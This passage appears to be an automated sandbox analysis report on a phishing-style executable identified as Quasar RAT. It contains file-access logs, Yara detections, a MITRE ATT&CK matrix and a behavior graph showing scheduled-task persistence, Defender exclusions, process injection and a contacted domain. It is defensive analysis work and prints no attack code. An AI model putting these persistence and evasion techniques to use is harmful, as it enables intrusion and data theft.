                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeQueries volume information: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Quasar RAT
                Source: Yara matchFile source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.outlooks.exe.4ba1d80.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.1683887266.00000000026A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1477097522.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1555939194.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1448519828.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1685100686.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3874269347.0000000003642000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Bestellung - 021224 - 901003637.exe PID: 6052, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Bestellung - 021224 - 901003637.exe PID: 2288, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: eNuXmIwkixzW.exe PID: 3020, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: outlooks.exe PID: 3648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: outlooks.exe PID: 4936, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: outlooks.exe PID: 6088, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Quasar RAT
                Source: Yara matchFile source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.outlooks.exe.4ba1d80.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.1683887266.00000000026A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1477097522.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1555939194.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1448519828.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1685100686.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3874269347.0000000003642000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Bestellung - 021224 - 901003637.exe PID: 6052, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Bestellung - 021224 - 901003637.exe PID: 2288, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: eNuXmIwkixzW.exe PID: 3020, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: outlooks.exe PID: 3648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: outlooks.exe PID: 4936, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: outlooks.exe PID: 6088, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                Windows Management Instrumentation                		1
                Scheduled Task/Job                		111
                Process Injection                		1
                Masquerading                		11
                Input Capture                		1
                Query Registry                		Remote Services11
                Input Capture                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Scheduled Task/Job                		1
                DLL Side-Loading                		1
                Scheduled Task/Job                		11
                Disable or Modify Tools                		LSASS Memory111
                Security Software Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		1
                Non-Standard Port                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager1
                Process Discovery                		SMB/Windows Admin SharesData from Network Shared Drive1
                Ingress Tool Transfer                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                Process Injection                		NTDS41
                Virtualization/Sandbox Evasion                		Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Hidden Files and Directories                		LSA Secrets1
                Application Window Discovery                		SSHKeylogging113
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Network Configuration Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem23
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567415 Sample: Bestellung - 021224 - 90100... Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 90 hoffmann3.ydns.eu 2->90 92 ipwho.is 2->92 94 bg.microsoft.map.fastly.net 2->94 100 Suricata IDS alerts for network traffic 2->100 102 Found malware configuration 2->102 104 Malicious sample detected (through community Yara rule) 2->104 106 14 other signatures 2->106 11 Bestellung - 021224 - 901003637.exe 7 2->11         started        15 outlooks.exe 2->15         started        17 eNuXmIwkixzW.exe 5 2->17         started        signatures3 process4 file5 82 C:\Users\user\AppData\...\eNuXmIwkixzW.exe, PE32 11->82 dropped 84 C:\Users\...\eNuXmIwkixzW.exe:Zone.Identifier, ASCII 11->84 dropped 86 C:\Users\user\AppData\Local\...\tmpB9B7.tmp, XML 11->86 dropped 88 Bestellung - 021224 - 901003637.exe.log, ASCII 11->88 dropped 126 Adds a directory exclusion to Windows Defender 11->126 128 Injects a PE file into a foreign processes 11->128 19 Bestellung - 021224 - 901003637.exe 4 11->19         started        23 powershell.exe 23 11->23         started        25 powershell.exe 23 11->25         started        27 schtasks.exe 1 11->27         started        29 powershell.exe 15->29         started        31 powershell.exe 15->31         started        37 2 other processes 15->37 130 Antivirus detection for dropped file 17->130 132 Multi AV Scanner detection for dropped file 17->132 134 Machine Learning detection for dropped file 17->134 33 schtasks.exe 17->33         started        35 eNuXmIwkixzW.exe 17->35         started        signatures6 process7 file8 80 C:\Users\user\AppData\...\outlooks.exe, PE32 19->80 dropped 108 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->108 39 outlooks.exe 19->39         started        42 schtasks.exe 19->42         started        110 Loading BitLocker PowerShell Module 23->110 44 conhost.exe 23->44         started        46 conhost.exe 25->46         started        48 conhost.exe 27->48         started        50 conhost.exe 29->50         started        52 conhost.exe 31->52         started        54 conhost.exe 33->54         started        56 conhost.exe 37->56         started        signatures9 process10 signatures11 112 Antivirus detection for dropped file 39->112 114 Multi AV Scanner detection for dropped file 39->114 116 Machine Learning detection for dropped file 39->116 118 2 other signatures 39->118 58 outlooks.exe 39->58         started        62 powershell.exe 39->62         started        64 powershell.exe 39->64         started        